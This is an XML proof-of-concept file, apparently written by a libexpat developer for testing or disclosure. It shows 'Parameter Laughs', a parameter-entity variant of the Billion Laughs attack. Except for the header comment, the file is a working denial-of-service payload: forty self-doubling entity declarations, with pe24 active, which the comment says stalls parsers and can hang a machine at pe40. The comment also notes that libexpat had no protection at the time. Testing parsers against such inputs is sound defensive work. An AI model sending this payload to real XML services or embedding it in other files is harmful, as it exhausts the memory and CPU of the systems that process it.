| <?xml version="1.0"?> |
| <!-- |
| Copyright (C) 2020 Sebastian Pipping <sebastian@pipping.org> |
| v3.1 2020-06-21, not (yet) to be published |
| |
| "Parameter Laughs", i.e. variant of Billion Laughs Attack |
| using parameter entities the other way around |
| |
| Use of "%pe24;" below makes the XML processor (e.g. "xmlwf -p < file.xml" or |
| "xmllint file.xml > /dev/null") take 3 to 12 seconds on my machine. |
| Increase to "%pe25;" and beyond carefully: use of "%pe40;" makes my machine |
| need a hard reset. |
| |
| Note that unlike libxml2, libexpat does not have any protection against |
| billion laughs attacks to this day, so it's not a new vulnerability |
| with regard to libexpat. Upcoming release libexpat 2.4.0 will have |
| protection against this family of attacks. |
| --> |
| <!DOCTYPE r [ |
| <!ENTITY % pe_1 "<!---->"> |
| <!ENTITY % pe_2 "%pe_1;<!---->%pe_1;"> |
| <!ENTITY % pe_3 "%pe_2;<!---->%pe_2;"> |
| <!ENTITY % pe_4 "%pe_3;<!---->%pe_3;"> |
| <!ENTITY % pe_5 "%pe_4;<!---->%pe_4;"> |
| <!ENTITY % pe_6 "%pe_5;<!---->%pe_5;"> |
| <!ENTITY % pe_7 "%pe_6;<!---->%pe_6;"> |
| <!ENTITY % pe_8 "%pe_7;<!---->%pe_7;"> |
| <!ENTITY % pe_9 "%pe_8;<!---->%pe_8;"> |
| <!ENTITY % pe10 "%pe_9;<!---->%pe_9;"> |
| <!ENTITY % pe11 "%pe10;<!---->%pe10;"> |
| <!ENTITY % pe12 "%pe11;<!---->%pe11;"> |
| <!ENTITY % pe13 "%pe12;<!---->%pe12;"> |
| <!ENTITY % pe14 "%pe13;<!---->%pe13;"> |
| <!ENTITY % pe15 "%pe14;<!---->%pe14;"> |
| <!ENTITY % pe16 "%pe15;<!---->%pe15;"> |
| <!ENTITY % pe17 "%pe16;<!---->%pe16;"> |
| <!ENTITY % pe17 "%pe16;<!---->%pe16;"> |
| <!ENTITY % pe18 "%pe17;<!---->%pe17;"> |
| <!ENTITY % pe19 "%pe18;<!---->%pe18;"> |
| <!ENTITY % pe20 "%pe19;<!---->%pe19;"> |
| <!ENTITY % pe21 "%pe20;<!---->%pe20;"> |
| <!ENTITY % pe22 "%pe21;<!---->%pe21;"> |
| <!ENTITY % pe23 "%pe22;<!---->%pe22;"> |
| <!ENTITY % pe24 "%pe23;<!---->%pe23;"> |
| <!ENTITY % pe25 "%pe24;<!---->%pe24;"> |
| <!ENTITY % pe26 "%pe25;<!---->%pe25;"> |
| <!ENTITY % pe27 "%pe26;<!---->%pe26;"> |
| <!ENTITY % pe28 "%pe27;<!---->%pe27;"> |
| <!ENTITY % pe29 "%pe28;<!---->%pe28;"> |
| <!ENTITY % pe30 "%pe29;<!---->%pe29;"> |
| <!ENTITY % pe31 "%pe30;<!---->%pe30;"> |
| <!ENTITY % pe32 "%pe31;<!---->%pe31;"> |
| <!ENTITY % pe33 "%pe32;<!---->%pe32;"> |
| <!ENTITY % pe34 "%pe33;<!---->%pe33;"> |
| <!ENTITY % pe35 "%pe34;<!---->%pe34;"> |
| <!ENTITY % pe36 "%pe35;<!---->%pe35;"> |
| <!ENTITY % pe37 "%pe36;<!---->%pe36;"> |
| <!ENTITY % pe38 "%pe37;<!---->%pe37;"> |
| <!ENTITY % pe39 "%pe38;<!---->%pe38;"> |
| <!ENTITY % pe40 "%pe39;<!---->%pe39;"> |
| %pe24; <!-- not at full potential, increase towards "%pe40;" carefully --> |
| ]> |
| <r/> |